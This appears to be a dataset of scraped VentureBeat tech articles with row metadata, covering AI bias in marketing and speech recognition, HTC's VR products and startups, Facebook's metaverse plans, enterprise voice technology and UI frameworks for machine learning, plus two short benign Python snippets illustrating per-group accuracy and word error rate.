"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest 5 steps to minimize AI bias in marketing Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, more and more marketing tools are AI-powered. As that shift has occurred, marketers are grappling with the fact that there will always be some form of unintentional algorithmic bias affecting those platforms. The bias is programmed even without data science teams realizing it, making it difficult to detect and resolve. As marketers, we inherit the biases in the algorithms we use for advertising, whether they’re algorithms we build or buy. Thus, it’s important to develop concrete steps to ensure minimal bias in the algorithms we use, whether it’s your own AI or AI solution from vendors. AI, particularly machine learning, already enhances a wide range of marketing solutions including hypersegmentation, dynamic creative, inventory quality filtering, dynamic sites, and landing pages. 
But there are lots of things that can get in the way of an algorithm’s success. When bias sneaks into AI, it can wreak havoc on efforts and campaigns in a variety of ways. This often happens because marketers have better or more data about some situations or customers than others, and that leads an algorithm toward being more accurate for the ones with greater data volume. Here are some common examples: We all want to “conquest” competitors’ customers, but marketers usually have better information about existing customers than future prospects. As a result, there can be a fair amount of risk that those algorithms are inherently more successful at finding people just like their current customers. Many marketers segment and target high-value customers. Since there is likely to be fewer of those, algorithms are typically trained mostly on data from the more common, lower-value customers. Consequently, those algorithms prove to be biased toward finding lower-value customers, hurting efforts overall. Marketers may have trouble optimizing marketing for late-adopting customers when early adopters make up most of the customer base for a newer product. This can easily occur, because it’s primarily the early adopters’ data that will be used to train the algorithm. Marketers might inadvertently prioritize inventory on shorter tail apps because the algorithms we use for bid optimization had more training data from those apps than from others. A key lesson here is that we can’t take AI algorithms at face value — and they’re certainly not infallible. Along with the new technology and new capabilities comes a new set of concerns to be aware of. Marketers need to ask a lot of questions — about everything from the motivations of the company selling the AI, to where the training data is coming from. We need to look at ourselves too, knowing that we bring biases to our interpretations based on our personal experience. 
Here are five concrete steps to take to ensure your AI isn’t overly biased: 1. Get involved and stay involved. Constant human involvement with AI is crucial. Question all assumptions and compare human decisions to model decisions, digging into any differences or patterns you can find. As a marketer, make sure not to commit too early to a “set-and-forget” automation use case for AI, and instead periodically ensure the algorithm is working the way you want. 2. Use representative training data. For any and all groups you want in your marketing, make sure that group is well represented in the training data. Predict rare outcomes, such as conversions, more accurately by ensuring those outcomes are over-indexed in training data, which will make sure the algorithm has lots of examples of success for each. As a marketer evaluating a vendor, make sure you are comfortable that your vendor has taken steps to ensure data representativeness. 3. Look beneath the surface. When you’re measuring accuracy, don’t just focus on the performance of the algorithm overall, but also look at each individual subgroup, like platforms, genders, and high vs. low LTV customers. Otherwise, you might only end up with accurate projections for digital as opposed to TV advertising, or for publishers with which you already invest a lot of money, as opposed to those new to your brand, for example. 4. Continually pursue better data. Don’t ever settle. Keep looking for better training data and ensure that your vendors are following the same approach. Get more, go wider and try new things to collect and/or leverage data you can use to optimize. Whoever has the best, most thorough and accurate training data has a massive advantage. As a marketer evaluating a vendor, ask about the training data — its accuracy, where it comes from, how often it’s updated. 
It’s important to remember that the “best” training data isn’t necessarily the biggest data set. The strength of the training data is more dependent on quality than quantity. 5. Evaluate AI with a dose of skepticism. It’s a powerful tool that is playing an increasingly larger role in targeting, data accuracy, creative versioning, testing, and measurement. AI-driven solutions can help marketers work smarter and achieve exciting new things at greater scale. Like any other investment, you need to know what you need to do to avoid risk. When you invest in an AI-based solution, you need to ask about algorithmic bias. Once you adopt a solution, ask again … and again. Jake Moskowitz is Vice President of Data Strategy and Head of the Emodo Institute. "
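Step 3 in the article, checking accuracy per subgroup rather than overall, can be sketched as a small evaluation helper. The group labels and records below are hypothetical illustration data, not real campaign results.

```python
from collections import defaultdict

# Sketch of per-subgroup accuracy evaluation: a strong overall score can
# hide a model that is much weaker on an underrepresented group.
def accuracy_by_group(records):
    """records: iterable of (group, y_true, y_pred) tuples -> per-group accuracy."""
    hits, totals = defaultdict(int), defaultdict(int)
    for group, y_true, y_pred in records:
        totals[group] += 1
        hits[group] += int(y_true == y_pred)
    return {g: hits[g] / totals[g] for g in totals}

# Hypothetical labeled predictions, grouped by advertising channel
data = [
    ("digital", 1, 1), ("digital", 0, 0), ("digital", 1, 1), ("digital", 0, 1),
    ("tv", 1, 0), ("tv", 0, 0),
]
print(accuracy_by_group(data))  # digital: 0.75, tv: 0.5
```

An overall accuracy of 4/6 here would obscure the fact that the model is markedly worse on the smaller TV group, which is exactly the imbalance the article warns about.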
15161
2016
"HTC shows off 20 virtual reality startups at its Vive X accelerator | VentureBeat"
"https://venturebeat.com/2016/12/07/htc-shows-off-20-virtual-reality-startups-at-its-vive-x-accelerator"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages HTC shows off 20 virtual reality startups at its Vive X accelerator Share on Facebook Share on X Share on LinkedIn Cher Wang, cofounder and chair of HTC. Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. HTC is all-in on the Vive virtual reality headset, and it is investing heavily in the companies that it is shepherding through its Vive X accelerator locations in San Francisco, Taipei, Shenzhen, and Beijing. Cher Wang, cofounder and chairperson of HTC, showed that commitment to VR at an event today, where the company showed off the first 20 startups that are going through its Vive X accelerator. “This is something that we never dreamed about, that I would be changing the world with every one of you,” Wang said. Marc Metis, global head of Vive X at HTC, also said that the company is moving boldly into investments in hardware, software, and services related to VR and augmented reality (AR). HTC has committed to investing more than $100 million in Vive X companies. 
He said that HTC received more than 1,200 applications for its first batch of accelerator companies this year. Nearly 40 companies have been accepted in the first batch, and HTC will be launching another batch of startups in February. HTC will also host demo days next week in Beijing and Taipei for other companies in the program. More than 100 venture capitalists and media were at the event on Wednesday in San Francisco. “We are still looking for ecosystem boosters, a force multiplier whose success can lead to other company successes,” Metis said. “We are also looking for pain point solvers.” Here’s an overview of the 20 companies that presented: Kaleidoscope: A photorealistic rendering company that makes tools to create imagery in VR. It can be used for a wide range of applications, such as architectural or product visualization. Apmetrix: This company makes analytics for VR, so that you can see how many people looked at an ad or a particular part of a VR experience. Immersv: It is an ad network for VR, enabling companies to make money from advertisements in VR. Christine Lee of Immersv said that engagement numbers for VR ads run at 30 percent to 40 percent, or far higher than the 1 percent on mobile and 0.4 percent on desktop. Video ads show a 70 percent completion rate in VR, she said, far higher than on other platforms. Her company is working with companies across the board such as Warner Bros., Lionsgate, Gree, MZ, and Element Games. BreqLabs: The company has created a way to use ultrasonic sensors to detect your hand movements so that you can bring your hands and fingers into VR and use them as control mechanisms. CEO Martin Labrecque said the company is raising a round of $600,000. 
SurrealVR: Arthur Goikhman, cofounder of SurrealVR, said his company has created a drop-in social VR framework that can make any VR experience social. SurrealVR comes with cross-platform support for avatars, voice chat, networked gameplay and physics, shopping and more. The company has more than 100,000 users so far, and it is profitable. It is also raising $5 million. Fulldive: It has created a smartphone-based VR navigation and content discovery platform. The vision is to make VR accessible to everyone, said CEO Giovanno Yosen Utomo. The company launched its platform for sorting through VR apps in January 2015, and it has been downloaded 2.5 million times. It has about 500,000 active users a month and 20,000 installs per day. Oben: The company has created a way to build personalized social avatars for AR and VR. Based in Los Angeles, its mission is to convert VR from a lonely experience to a social one. You customize your appearance, change your hair, and create something that you won't be embarrassed about when you go into a business meeting in VR. Teemew: This is another startup creating a VR meeting solution in the hopes of eliminating travel costs and promoting real-time collaboration. LumiereVR: Cofounder Travis Wu named the company after the Lumiere brothers, who pioneered film. He wants to do the same for VR films. The company has in-house filmmaking technology and access to artists who want to create new kinds of films. The company will distribute its films through the distribution channels of its Chinese partners. Clevr: This is another company creating a social layer in VR. Clevr wants to unite your social presence across all devices, including VR, and add a layer of discovery through various viral channels. CEO Japheth Dillman said you'll be able to join friends in content apps, chat in a VR room, and discover new apps. Metaverse Channel: This company has created an interactive educational platform that utilizes VR's immersive technology to accelerate learning. 
Its mission is to inspire and educate the minds of today by resurrecting the greatest minds from the past. It will have things like virtual field trips and tutorials. Shortfuse Game Studios: This company is making a shooter game so you can have firefights in VR arcades (aka VRcades). Shortfuse wants to create shooter games that will become esports crazes in VR. AppMagics: AppMagics is a mixed-reality content generation and interactive platform with VR live streaming. The company is in 140,000 Internet cafes. Augmented Intelligence: CEO Sam Jang said he wants to create acupuncture in VR. Augmented Intelligence is all about fostering the medical platform in acupuncture and human anatomy. The goal is to provide better understanding and treatment of human bodies through virtual training and simulation from medical partners. Metaverse Technology: CEO Steve Hsia said his team loves "guns and VR tech." The company is taking "shooting sports" such as Airsoft, paintball, and gun-range shooting to VR. He noted the U.S. has big audiences for shooting sports, gun ownership, and first-person shooters, and his startup hopes to unify all of those markets through both single-player and multiplayer competitions. Directive Games: The company is creating online competitive multiplayer games for VR. Drop: This startup provides a 3D and immersive Internet search experience for virtual users. Fishbowl VR: The company provides crowdsourced testing and user insights to help content creators figure out what works and what doesn't in virtual reality. Lyra VR: It provides an innovative and fantastical way to create, perform, and immerse oneself in music, allowing for VR music creation with "visual symphonies" and collaboration across popular media devices. Opaque Studios: This combines the two most exciting fields in tech and Hollywood — VR and virtual production — to enable directors of feature films, episodic TV, games, and VR to visualize virtual performances with the immediacy of live action. 
"
15,162
2,021
"HTC unveils portable Vive Flow immersive glasses for relaxation | VentureBeat"
"https://venturebeat.com/2021/10/14/htc-unveils-portable-vive-flow-immersive-glasses-for-relaxation"
"HTC unveils portable Vive Flow immersive glasses for relaxation. HTC is taking virtual reality in a new direction today with the portable Vive Flow immersive glasses. The Vive Flow looks more like compact and lightweight augmented reality glasses, but it has a wrap-around cloth barrier that creates your own personal VR enclosure. As such, the glasses are a kind of hybrid between AR and VR, and they're meant to be worn for a longer time so that people can use them to find moments to relax, refresh, and restore. Designed with comfort and portability in mind, Vive Flow lets people find moments of calm and well-being for themselves throughout the day, including meditating with apps like Tripp, or taking a scenic, immersive drive down Route 66 with MyndVR's original series: A Road to Remember. 
Overall, I thought the device was very well done. Above: You can connect your Vive Flow to a power source and wirelessly to your smartphone. Kuen Chang, head of creative labs at HTC Vive, showed me a demo unit that I wore on my head. Like other VR headsets, it transported me to another world where I got to use relaxing apps like Tripp. The glasses are very lightweight and the seal is pretty good with the cloth liners on the side of the glasses. That means no light gets in from the outside to disturb you in your own personal cinema. The glasses were plugged in via a USB-C wire to a battery, and the glasses synced with apps on an Android smartphone. The Vive Flow weighs 6.6 ounces, or about as much as a chocolate bar. You can watch TV or movies on your own personal, cinema-sized VR screen. You can exercise your mind with brain training apps, or collaborate and socialize with colleagues and friends on Vive Sync. Above: HTC Vive Flow helps you meditate. "With Vive Flow, HTC is taking technology in a new direction, focusing not on what we do, but on how we feel," said HTC CEO Cher Wang, in a statement. "Maintaining our wellness has come to the forefront in the last few years, with so many millions feeling stressed every day, so it has never been more important to take time out to calm our minds, and Vive Flow provides the perfect opportunity to escape our four walls and immerse ourselves in our ideal ambience." The Vive Flow will be available in November for $500. A 5G Android smartphone is required. I tried out the XR wellness app from Tripp, which was started by CEO Nanea Reeves to help people meditate. It was a pretty amazing experience, with lots of fluid movement and pretty lighting. It was like being in VR with a school of fish around me. Very relaxing. 
With Vive Flow, you can dive into a range of immersive experiences via the Viveport app store anytime, anywhere, using your Android smartphone as a controller. You can connect wirelessly to an Android 5G smartphone and stream content like TV shows and films from your favorite platforms. For mirroring premium video like TV and film content from an Android smartphone, the device must support HDCP 2.2. Above: HTC Vive Flow costs $500. And you can meet with friends in realistic virtual environments via Vive Sync. The glasses frame's dual-hinge design and soft face gasket allow it to fold down into a compact footprint for portability. Vive Flow's hinge is designed to fit many different head shapes and sizes. Its face gasket takes inspiration from the acclaimed Vive Focus 3, with magnetic connections making it simple and quick to swap out — perfect for when you want to share. Vive Flow also has built-in diopter dials, allowing users to easily make adjustments for crystal clear visuals. Its active cooling system pulls warm air away from your face, keeping you comfortable throughout the day. I thought this was an awesome part of the glasses. I wear prescription glasses, and I usually find VR headsets to be uncomfortable, so much so that I remove my glasses and can't see as well. But the dials enable me to find something close to my glasses prescription and see more clearly. Since the dials have numbers on them, you can easily remember the right setting for each eye. You can pull out the magnetic face plate and wash the surface if you need to. Above: HTC Vive Flow ships in November. If anything was difficult to do, it was using the smartphone as a controller. I tapped on the screen but sometimes it didn't detect my touch. So I had to repeat that a few times until it recognized what I was trying to do. 
The Vive Flow has an expansive 100-degree field of view that creates a cinematic screen to lose yourself in, with HD-quality content at a sharp 3.2K resolution and a smooth 75 Hz refresh rate. Featuring full 3D spatial audio, Vive Flow delivers immersive sound and can also connect to external Bluetooth earphones. You can buy a 10,000 mAh Vive power bank separately. That gives you around four or five hours of battery life. HTC Vive is also unveiling a special Viveport subscription plan following the launch of Vive Flow. The plan is priced at $6 per month and gives people unlimited access to a wide range of immersive apps covering well-being, brain training, productivity, light gaming, and exclusive content like a Lo-Fi room designed to look and feel like a cozy café. Pre-orders start today. 
"
15,163
2,021
"Facebook’s vision of the metaverse has a critical flaw | VentureBeat"
"https://venturebeat.com/2021/09/12/facebooks-vision-of-the-metaverse-has-a-critical-flaw"
"Facebook's vision of the metaverse has a critical flaw. The "metaverse" is back in the headlines. Mark Zuckerberg recently announced that Facebook "will effectively transition from … being a social media company to being a metaverse company." Facebook plans to create "an embodied internet" — powered by its Oculus headsets and bridging the company's platforms in virtual space. And Facebook is not alone, as Epic Games, Disney, and other corporations are also investing billions in their virtual worlds. Is this metaverse talk exciting? Sure. Is this new? Hardly. The term metaverse is nearly 30 years old. Coined by sci-fi author Neal Stephenson in his 1992 novel Snow Crash, the metaverse was his name for the convergence of physical reality and virtual space. The idea was a persistent, shared environment that blurred the digital and physical for everyone who entered it. 
This concept is just as enticing today as it was back in 1992, but why are big players in gaming and technology rediscovering the metaverse today? The generational shift driving big tech to the metaverse My son just turned 11, and among his presents was a small cash gift from his grandfather. Since he was free to burn this birthday money on anything he wanted, I couldn't wait to see what he'd buy. So imagine my reaction when he decided to purchase new skins for his Call of Duty avatar. Pixels rendered on a screen? Seriously? I gently asked if he was sure he wanted to buy something digital that couldn't be removed from the PC. Without hesitation, he responded "Yes!" And once he'd bought and added his new skins for the game, he wanted to show it off to me, his mom, his siblings … and of course, everyone he played with online. I tell this story to illustrate the generational shift driving Big Tech's rediscovery of the metaverse: Younger people are more than willing to pay real money for entirely virtual items. And it's not just kids and teenagers — the explosion of interest in Non-Fungible Tokens (NFTs) represents the grown-up version of unique virtual goods having real cash value. While NFTs can be essentially anything digital, they're usually digital art or memorabilia like Jack Dorsey's first tweet (which sold for $3 million). So why are all these digital goods worth actual money to their buyers? The same reason my son wanted to show off his shiny new pixels to everyone who would listen: The value of digital goods comes from as many people as possible seeing that you have them. Put in terms my older generation could understand, you don't buy a Ferrari because you need to get places fast. You buy a Ferrari because it looks amazing and you want to look amazing in it. 
Without a crowd of gawking onlookers, it’s just a fast (and costly!) car, not the status symbol it is meant to be. What Facebook doesn’t understand about the metaverse The growing real-world value of digital items helps explain why the metaverse is back in vogue, but we must remember the foundation of value for these digital items is social. Without a large audience to gaze upon your avatar skins or NFTs, these items are just unseen pixels on a screen. And to maximize the audience for digital goods, the metaverse must be open and cross-platform. Otherwise, these digital goods are like a Ferrari buried under junk in your garage. This need for an open, cross-platform experience is why Facebook’s metaverse initiatives will fail. Everything Facebook does is inside a closed experience controlled by their engineers and admins. Even if you want to use your Oculus headset to access a third-party virtual reality app, you must sign in with a Facebook account. I understand why the company does this, as its lifeblood is unfettered access to user data. Zuckerberg probably sees this metaverse expansion as a way to more fully immerse his userbase into Facebook and get even more data and dollars from them. However, Facebook’s ethos of top-down control is the exact opposite of what a thriving metaverse needs. Imagine the reactions of people like my son who want to show off new skins for their metaverse avatars, only to discover their friends outside Facebook can’t see them and they’d only get responses from Facebook’s custom-built echo chamber. It’s safe to assume from Facebook’s history that the company will always prioritize a tightly controlled environment over an open metaverse. In short, do we really want a metaverse owned by Facebook — or anyone? Imagining a better metaverse I don’t write this to join the online pile-on criticizing Facebook’s metaverse vision but because I’m legitimately excited by the potential of metaverse technology. 
My company has a ton of customers creating VR and AR applications. I've seen firsthand how engaging it can be to layer a heads-up display on a HoloLens for engineering work or to add AR targets to run over during an electric scooter ride. I've also seen how sad and isolating an empty virtual world can be when there's no one in it besides internal testers. As we imagine a better metaverse, here are three core principles it must have: The metaverse is open, not closed. The more our digital worlds are cross-platform and inclusive to everyone interested in experiencing them, the richer and more engaging they will be. The metaverse is an expansion of the physical world, not a retreat from it. While I enjoyed the movie "Ready Player One," there's much more promise in a metaverse that layers new meaning onto our shared physical existence than one that encourages us to play VR games inside a dark, enclosed room. The metaverse should connect people, not divide them. For an open and inclusive platform to work, it needs a strong community that draws people in and welcomes them — while actively resisting trolls and other bad actors trying to stir up dissension. As younger generations embrace a more digital world and drive investment in the metaverse, I don't want to be a skeptical old guy who misses out on the fun. Instead, I want companies like mine to take seriously their responsibility to make this new world the best it can be. Instead of only building a metaverse we can control and profit from, let's make one that's better than the world we have now — open, expansive, and connective. Jerod Venema is the founder and CEO of real-time video communication company LiveSwitch, which counts UPS, Match.com, Bosch, and WWE among its customers. 
"
15,164
2,021
"Voice tech makes inroads in the enterprise | VentureBeat"
"https://venturebeat.com/2021/07/04/voice-tech-makes-inroads-in-the-enterprise"
"Voice tech makes inroads in the enterprise. [Story updated 7/8/2021 to correct Gong's valuation based on its recent funding.] Some good news and some bad news for voice technology partisans in the workplace: The bad news is that the dream of a voice assistant in every conference room and on every desk hasn't come to pass. The good news is that voice technology is still having an impact in business, just outside of white-collar workplaces. Voice assistants have never taken hold in the office. In 2017, Amazon announced Alexa for Business. In the official announcement, the company outlined use cases like starting meetings in conference rooms or asking for information around the office. While Amazon hasn't released detailed stats on Alexa for Business adoption, even Amazon partners haven't all jumped in. 
WeWork paused its partnership, and Ajoy Krishnamoorthy of Acumatica said they have seen concerns around security. And this was all before offices became a place that sat empty while workers stayed home. Voice technology has seen adoption in verticals such as farming, where companies like AgVoice, founded by farm owner and technologist Bruce Rasa, use voice technology to improve data management. AgVoice claims a 50% improvement in performance. Voice assistants are making warehouse work more efficient, as well. While voice picking has been around for decades, improvements in speech recognition and NLU (natural-language understanding) technology have increased the effectiveness and the uptake of voice. In retail, you can't get any bigger adoption than Wal-Mart, and it is likewise bringing a voice assistant into its stores via the Ask Sam voice app. The app is a voice-driven tool for employees that brings together information like employee schedules, stock information, and even recipes. Wal-Mart says that this keeps employees on the floor, instead of needing to go find a computer to look up information. We see, then, that there are fields where voice technology is making an impact, and we haven't even touched on hospitality or the medical field. But what about back in the enterprise? In many ways, voice assistants didn't revolutionize the enterprise because there was a solution but not a problem. The dream of asking Alexa for sales numbers isn't that useful when you have your CRM open in the browser on your laptop all day. Yet voice technology is still having a major impact on the enterprise, just not packaged as an assistant. 
Companies like Chorus.ai and Gong are using speech recognition and natural language understanding to give sales teams insights into their performance, with significant traction, including a $7.25 billion valuation for Gong. Customer support is another domain in which voice technology is having an impact on the enterprise bottom line. Google continues to invest in contact center voice technology via Dialogflow and its Contact Center AI. Its virtual agent technology is indeed an assistant of sorts, just one narrowly scoped for customer support, with an eye towards helping customers self-serve their problems and leave humans to handle the thornier requests. While NLU and speech recognition technology became good enough to enable smart assistants, these smart assistants and the competition between companies like Google, Amazon, Microsoft, and Apple, in turn improved NLU, speech recognition, and semantic understanding technologies. Tech that a few years ago was only available to companies with millions upon millions of dollars to funnel into machine learning efforts is now available to everyone to integrate directly or via SaaS. While we aren’t seeing voice assistants in conference rooms, we are seeing the impact that they have had when new products that leverage NLU or voice recognition reduce customer support costs, make farm work easier, or provide coaching for revenue teams. For most, integrating voice and NLU is an iterative process. Customer support is often the best place to start as companies are likely to see an immediate reduction in costs when customers find their own answers to their questions without reaching out to a human. Another solid starting point is implementing sales tools like Chorus.ai or Gong, which will bring in more revenue. Successful projects focus on the areas where voice and NLU can make improvements to processes that are already in place, parlaying early wins to further investments and expansion down the line. 
Dustin Coates is Product and GTM Manager at Algolia, co-host of the VUX World podcast, and author of Voice Applications for Alexa and Google Assistant. 
"
15,165
2,021
"Building MLGUI, user interfaces for machine learning applications | VentureBeat"
"https://venturebeat.com/2021/07/19/building-mlgui-user-interfaces-for-machine-learning-applications"
"Building MLGUI, user interfaces for machine learning applications. Machine learning is eating the world, and spilling over to established disciplines in software, too. After MLOps, is the world ready to welcome MLGUI (Machine Learning Graphical User Interface)? Philip Vollet is somewhat of a data science celebrity. As the senior data engineer with KPMG Germany, Vollet leads a small team of machine learning and data engineers building the integration layer for internal company data, with access standardization for internal and external stakeholders. Outside of KPMG, Vollet has built a tool chain to find, process, and share content on data science, machine learning, natural language processing, and open source using exactly those technologies. 
While there are many social media influencers sharing perspectives on data science and machine learning, Vollet actually knows what he is talking about. While most focus on issues of model building and infrastructure scaling, Vollet also looks at the user view, or frameworks for building user interfaces for applications utilizing machine learning. We were intrigued to discuss with him how building these user interfaces is necessary to unlock AI's true potential. The lifecycle of machine learning projects Vollet and his team build data and machine learning pipelines to analyze internal data and work on reports for KPMG's management. They implement a layer enabling access to data and build applications to serve this goal. The first question to address when it comes to building user interfaces for machine learning applications is, are those applications different from traditional applications, and if yes, how? Vollet finds that most of the time there is not much difference. The reason is that he applies the same steps to develop a machine learning product that he also does for "regular" software development projects. Vollet also spoke about his method of approaching software development projects. The steps taken are as follows: It starts with budgeting, and then people allocation. Based on the project's budget, the project is staffed. Then the project has to be brought into KPMG's DevOps environment. Consequently, sprints are planned, stakeholders are consulted, and the project's implementation life cycle starts. Seen at this level of abstraction, every software project looks the same. Continuous integration / continuous delivery is another good DevOps practice that Vollet's team applies. What is different in projects that involve machine learning is that there are more artifacts to manage. 
Crucially, there are datasets and models, and evolution in both of those is very real: "It's possible that today a model fits perfectly into our needs, but in six months we have to re-evaluate it," Vollet said. MLOps, anyone? So at which point does a user interface come into play in machine learning projects? The brief answer is, as soon as possible. Generally, Vollet considers having stakeholders in the loop as early as the first iteration, because they can familiarize themselves with the project and their feedback can be incorporated early on. A good user interface is needed, because if we only show people code snippets, it's too abstract, Vollet said: "With a Graphical User Interface, people can get an idea of what's happening. Having an interface changes everything, because it's easier for people to understand what's happening. Most of the time, machine learning is really abstract. So we have an input, there's a workflow, and then we have the end result. If you have a user interface, you can directly show the impact of what you are doing." Building user interfaces for machine learning applications What are the key criteria to be considered when choosing a framework to build a user interface for machine learning applications? For Vollet's team, the ability to run on premise, in KPMG's own cloud, is the top priority. For many projects in KPMG, it's a requirement. Then comes charting. The range of chart and diagram types each user interface framework supports is one of the most important parameters. Then, it also has to be easy to use and to fit in their technology stack. For Vollet, this means "something that the operations team can support." If it's in the list of supported frameworks, there does not have to be an extra request and extra time both for the operations and the development team to familiarize themselves with the framework. There are many tools they use, and they keep testing new ones. 
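The re-evaluation Vollet alludes to ("in six months we have to re-evaluate it") is often implemented as a periodic check of the deployed model against fresh labeled data. A minimal sketch of that idea, with invented function names and an invented tolerance threshold (this is an illustration, not code from Vollet's team):

```python
# Hypothetical sketch of periodic model re-evaluation: a model that fits
# today is re-scored on fresh labeled data later, and a drop beyond a
# tolerance flags it for retraining. Names and thresholds are invented.

def accuracy(predictions, labels):
    """Fraction of predictions that match the labels."""
    correct = sum(1 for p, y in zip(predictions, labels) if p == y)
    return correct / len(labels)

def needs_reevaluation(baseline_accuracy, fresh_accuracy, tolerance=0.05):
    """Flag the model if accuracy on fresh data fell more than `tolerance`."""
    return (baseline_accuracy - fresh_accuracy) > tolerance
```

In practice the fresh-data score would come from the same pipeline that produced the original evaluation, so that the two numbers are comparable; the flag would then feed whatever retraining process the team's DevOps environment supports.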
The market for frameworks that help build user interfaces for machine learning projects is growing: new players appear and old ones evolve. The big question is which frameworks Vollet's team usually works with. Vollet's default option is Streamlit, "because it's super easy. You have features like a date picker. Also, you can have a front-end with a file upload, which business analysts can use as a front end to upload their Excel files or CSV, then do some adjustments." For something a bit more advanced, Vollet's choice is Gradio: "It's more focused for machine learning. There are so many features built into it in a short time. You can run it on Jupyter notebooks, or on Google Colab. It's super-integrated and it's cool, I highly recommend it." Plotly with Dash is another option Vollet thinks highly of. Dash's promise is to enable users to build and deploy analytic web apps using Python, R, and Julia, with no JavaScript or DevOps required; Dash is built by Plotly and leverages Plotly's charting under the hood. This one is more suitable for enterprises, as it needs infrastructure to run on, but it has good charting support, Vollet said. Last but not least, there's what Vollet called the new kid on the block, Panel. It's a high-level application and dashboarding solution for Python. Panel works with visualizations from Bokeh, Matplotlib, HoloViews, and many other Python plotting libraries, making them instantly viewable either individually or combined with interactive widgets that control them.

MLGUI: The art and science of developing GUIs for machine learning applications

Besides those open source frameworks, Vollet had some honorable mentions. One was Deepnote. Deepnote is not a user interface framework per se; rather, it is touted as a new kind of data science notebook, Jupyter-compatible, with real-time collaboration and running in the cloud. As notebooks also have visualization capabilities, it may be relevant too.
Another tool Vollet mentioned was Gooey. It's the kind of tool used more for putting a user interface on a Python application or script. It's not so much a charting library people use to build a user interface for machine learning applications, although it can be used for that. Integration seems to be centered around data science notebooks. When using Google Colab, for example, you can use Gradio and Plotly, so they are integrated in some sense, said Vollet. If you want full-stack integration, then perhaps you are better off with Dash, he added. Another interesting question is the degree to which those frameworks offer some flavor of MLOps support: if a new feature gets added to a machine learning model, would those frameworks be able to pick it up and use it, or would this have to be done manually? Gradio can do this, at least to some extent; in other frameworks, this would be a manual process, Vollet said. Our takeaway is that MLGUI is another burgeoning domain adjacent to data science and machine learning. Just as MLOps applies DevOps principles and practices to the special needs that arise from developing machine learning at scale, we would argue MLGUI is on the rise: it's the otherwise well-known art and science of developing GUIs for applications, with the twist of applying it to applications that use machine learning. Even though that's not a category in its own right at this point, perhaps it should be. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! 
VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,166
2,022
"Report: 29% of execs have observed AI bias in voice technologies | VentureBeat"
"https://venturebeat.com/2022/02/14/report-29-of-execs-have-observed-ai-bias-in-voice-technologies"
"Report: 29% of execs have observed AI bias in voice technologies

According to a new report by Speechmatics, more than a third of global industry experts reported that the COVID-19 pandemic affected their voice tech strategy, down from 53% in 2021. This shows that companies are finding ways around obstacles that seemed impassable less than two years ago. The last two years have accelerated the adoption of emerging technologies, as companies have leveraged them to support their dispersed workforces. Speech recognition is one that's seen an uptick: over half of companies have successfully integrated voice tech into their business. However, more innovation is needed to help the technology reach its full potential. Many were optimistic in their assumption that by 2022, the pandemic would be in the rearview mirror. 
And though executives are still navigating COVID-19 in their daily lives, the data indicates that they've perhaps found some semblance of normal from a business perspective. However, there are hurdles the industry must overcome before voice technology can reach its full potential. More than a third (38%) of respondents agreed that too many voices are not understood by the current state of voice recognition technology. What's more, nearly a third of respondents have experienced AI bias, or imbalances in the types of voices that are understood by speech recognition. There are significant enhancements to be made to speech recognition technology in the coming years. Demand will only increase due to factors such as further developments in the COVID-19 pandemic, demand for AI-powered customer service and chatbots, and more. But while it may be years until this technology can understand each and every voice, incremental strides are being made in these early stages, and speech-to-text technology is on its way to realizing its full potential. Speechmatics collated data points from C-suite, senior management, middle management, intermediate, and entry-level professionals across a range of industries and use cases in Europe, North America, Africa, Australasia, Oceania, and Asia. Read the full report by Speechmatics. 
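The "imbalance" behind AI bias in speech recognition is often quantified as a gap in word error rate (WER) across speaker groups. Below is an illustrative, stdlib-only sketch; the transcripts and group labels are made-up data, not Speechmatics' methodology:

```python
def word_error_rate(reference: str, hypothesis: str) -> float:
    """WER: word-level Levenshtein distance divided by reference length."""
    ref, hyp = reference.split(), hypothesis.split()
    # Dynamic programming table for substitutions, insertions, deletions.
    d = [[0] * (len(hyp) + 1) for _ in range(len(ref) + 1)]
    for i in range(len(ref) + 1):
        d[i][0] = i
    for j in range(len(hyp) + 1):
        d[0][j] = j
    for i in range(1, len(ref) + 1):
        for j in range(1, len(hyp) + 1):
            cost = 0 if ref[i - 1] == hyp[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # deletion
                          d[i][j - 1] + 1,        # insertion
                          d[i - 1][j - 1] + cost) # substitution
    return d[len(ref)][len(hyp)] / max(len(ref), 1)

# Made-up (reference, recognizer output) pairs per speaker group.
samples = {
    "group_a": [("turn the lights on", "turn the lights on")],
    "group_b": [("turn the lights on", "turn delights on")],
}
for group, pairs in samples.items():
    wers = [word_error_rate(r, h) for r, h in pairs]
    print(group, sum(wers) / len(wers))
```

A WER of 0.0 for one group and 0.5 for another on the same utterances is precisely the kind of imbalance respondents reported observing.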
"